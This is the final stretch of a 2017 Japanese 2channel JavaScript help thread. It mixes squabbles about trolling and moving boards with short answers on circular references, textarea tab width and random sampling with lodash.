リアル世界では淘汰される人間でもここでは成り立ってしまい、ここしか居場所がない連中が多くなっていくという
958 :
2017/03/16(木) 06:51:00.43 ID:???
おいおいwぶっちゃけ最近は全くと言っていいほど荒れてないぞ?
一番酷いときは3スレくらい掛けて何かの派閥が集団で妨害工作が続いたもんだよ
ちょっと頑固なのが2,3人居る位じゃ静かなで健全な方だよ
959 :
2017/03/16(木) 08:48:29.23 ID:???
昨日から屁理屈こねてる人は一人だけだが、彼に自覚症状がないor現実逃避してるのが問題だな(彼が「荒れてない」といっているのはその為)
荒らしが限定されているのだから、プログラム板に移行すれば自然と浮き彫りになって解決する問題ともいえるが
960 :
2017/03/16(木) 09:14:05.12 ID:???
逆にどれが怪しいレスでどれが正しいらしいレスかわかりやすくなるってもんよ
961 :
2017/03/16(木) 09:31:19.33 ID:???
いろんな意見があって良いものなのに
他人の意見を排除しようとするやつがいるからな
そのせいでjQueryスレが分裂させられた
962 :
2017/03/16(木) 13:30:54.06 ID:???
>>959
流石に皮肉くらい分かってくれ
963 :
2017/03/16(木) 13:45:01.45 ID:???
babel推せなくなったからでそ。
964 :
2017/03/16(木) 16:19:15.94 ID:???
>>961
あれはjsではないまた蒸し返すのかよ。
965 :
2017/03/16(木) 17:40:29.41 ID:???
>>950
間違ったことを言ったら人格否定される、もとい、訂正してくれる2chのほうが知恵袋より信用できるだろ。
966 :
2017/03/16(木) 18:52:39.30 ID:???
他の欠点を取り上げる事で2chを持ち上げるのが好きな人だな
そんなことをやっても2chの評価があがることはないのに
967 :
2017/03/16(木) 20:38:04.86 ID:???
ネガティブキャンペーンというやつだな
例「間違っていても間違っていなくても人格否定されたり、煽られる2chより他のQ&Aサイトの方がずっと信用できるだろ」
968 :
2017/03/16(木) 21:08:58.78 ID:???
固定化された間違った情報に対してこれまでどれほどの被害者が出たと思ってる
プログラミング界では、古い情報と間違った情報は親の敵より憎い敵だろ
マサカリ文化だってあるし、批判の掛け合いが無いと
この流れが速く混沌とした世界を正常化できないんだよ
泥団子のようにへしゃげられ傷つけられた結果、黄金に輝けるのがプログラマーという存在だよ
969 :
2017/03/16(木) 21:24:15.56 ID:???
なんか臭い
970 :
2017/03/16(木) 21:29:00.62 ID:???
オブジェクトがプロパティで他のオブジェクトを参照ってよく有るとおもうけど、2つのオブジェクトが相互に参照してるの場合、シリアライズ以外で何か問題あるかな?
971 :
2017/03/16(木) 21:32:31.72 ID:???
一昔前はガーベジコレクションで問題になってたけど、今は問題ないかと
DOMで循環参照なんていくらでもあるし、他の問題も思いつかない
972 :
2017/03/16(木) 21:39:57.65 ID:???
>>971
なるほど
今プログラムは問題なく動いてるようだけどこれで良いのか判らず気になってたんだよね
よかった

とあるオブジェクトが子オブジェクトを生成し内包して、その子が親のメソッドつかったりするために、子に親への参照を持たせてるという感じ

他にスマートなやり方が思いつかず相互参照してる
973 :
2017/03/16(木) 23:44:21.22 ID:???
>>964
蒸し返す必要はない。
黙っていれば、そこで話は終わりだ
974 :
2017/03/17(金) 08:45:39.05 ID:???
>>966
他所の欠点なんて一言も書いてないが、頭大丈夫か?
975 :
2017/03/18(土) 01:03:32.39 ID:???
図星で反論言い訳見苦しいぞ
思い当たることあるからレスするんだろうw
976 :
2017/03/18(土) 04:43:03.36 ID:???
jsでtabの幅を変更する方法ありますか?
テキストエリア内でtabの幅を調整するには何か良い方法ないですか?
css使わずに。
977 :
2017/03/18(土) 05:01:14.25 ID:???
css使う方法ならあるけど
978 :
2017/03/18(土) 11:24:16.19 ID:???
tabを固定幅空白記号に置き換えればいいよ
979 :
2017/03/18(土) 11:56:18.00 ID:???
<質問>
ある数字リストの冒頭の10個から、任意の3つの数字を選んで出力するスクリプト
</質問>
980 :
2017/03/18(土) 12:02:02.20 ID:???
<提案>
数字リストの冒頭の10個を取り出してfisher-yates辺りでシャッフルして頭から3つ出力
</提案>
981 :
2017/03/18(土) 13:53:23.41 ID:???
>>979
https://lodash.com/docs/4.17.4#sampleSize を使う

var list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
console.log(_.sampleSize(list.slice(0,10), 3));
982 :
2017/03/18(土) 14:01:37.48 ID:???
lodashはFisher-Yatesが使われてるから
>>981>>980の提案を満たしている。

そして思ったのが

数字リストの冒頭の10個を取り出してfisher-yates辺りでシャッフルして頭から3つ出力
_.sampleSize(list.slice(0,10), 3)

日本語で書くよりもコードのほうが短いという事実w
983 :
2017/03/18(土) 14:40:36.61 ID:???
うーん!この自演カッコイイ!
984 :
2017/03/18(土) 14:59:50.81 ID:???
え? 誰と誰が自演?
985 :
2017/03/18(土) 15:00:37.06 ID:???
>>981>>982はともに俺だよ?
見ればわかるし隠す意味ないよね?
986 :
2017/03/18(土) 15:06:38.89 ID:???
自演ではないが自画自賛だな
987 :
2017/03/18(土) 15:16:10.13 ID:???
自画自賛? え?どこが?
俺が書いたのは普通のコードなんだが
それがすごく見えてしまう人?
見る側の問題では?
988 :
2017/03/18(土) 15:50:08.43 ID:???
図星で反論言い訳見苦しいぞ
思い当たることあるからレスするんだろうw
989 :
2017/03/18(土) 16:10:22.56 ID:???
>>988
仕事できないからって僻まなくてもw
990 :
2017/03/18(土) 16:45:04.35 ID:???
仕事?
学部新入生の入学前の課題だろ?
991 :
2017/03/19(日) 03:59:39.29 ID:???
また図星でレスしたくなる病人わいてるのかよ
自分より下を作ろうと必死なカスと同等のゴミカス
992 :
2017/03/19(日) 10:12:02.05 ID:???
もうすぐ、スレが埋まるわけだが、このスレは無責任なレスで溢れかえっているので、他のサイトもしくはプログラム板に移行する事を強く推奨する

JavaScript の質問用スレッド vol.122
http://echo.2ch.net/test/read.cgi/tech/1472426483/
993 :
2017/03/19(日) 12:25:59.43 ID:???
ワッチョイいいね
Web制作板に導入される気配は皆無だし、移行もやむなしかな
994 :
2017/03/19(日) 15:48:15.95 ID:???
図星や下探しのカスを絞り込めるだろうから賛成
995 :
2017/03/19(日) 22:56:52.97 ID:???
君が、lodash厨だったかw

lodashの布教活動はもう良いから、
早く、日本語のドキュメントを作ってくれ

一々、Underscoreの日本語ドキュメントを見るのが、面倒
996 :
2017/03/19(日) 23:14:22.19 ID:???
つうかlodashやらも今となっては古参の部類だから今更盛り上がることは無い
今まで使ってた人だけで今まで通り回していけばいいだけの話
997 :
2017/03/20(月) 21:56:40.56 ID:???
>>996
> つうかlodashやらも今となっては古参の部類だから今更盛り上がることは無い
その理屈だと古参のJavaScriptはもっと盛り上がることはないことになるね。
それからlodashに変わるものって出来たっけ?

ArrayやObjectのプロトタイプを拡張して
lodashの全機能を使えるようにしたらいいのにね
998 :
2017/03/20(月) 21:59:13.26 ID:???
>>997
だからそういうのを辞めろって言ってるの
敵は居ないんだから押し売りも辞めろって
999 :
2017/03/20(月) 21:59:48.85 ID:???
>>998

(10) 時にはあなたが望む「答え」だけでなく、「意見」などが寄せられる場合もあります。
1000 :
2017/03/20(月) 22:00:06.29 ID:???
プログラム板にも人はいるから移行するのは容易だな
1001 :
1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
life time: 54日 23時間 17分 22秒
1002 :
1002
Over 1000 Thread
2ちゃんねるの運営はプレミアム会員の皆さまに支えられています。
運営にご協力お願いいたします。


───────────────────
《プレミアム会員の主な特典》
★ 2ちゃんねる専用ブラウザからの広告除去
★ 2ちゃんねるの過去ログを取得
★ 書き込み規制の緩和
───────────────────

会員登録には個人情報は一切必要ありません。
月300円から匿名でご購入いただけます。

▼ プレミアム会員登録はこちら ▼
http://premium.2ch.net/

▼ 浪人ログインはこちら ▼
https://login.2ch.net/login.php
314KB
レス数が1000を超えています。これ以上書き込みはできません。
★スマホ版★■掲示板に戻る■全部前100次100最新50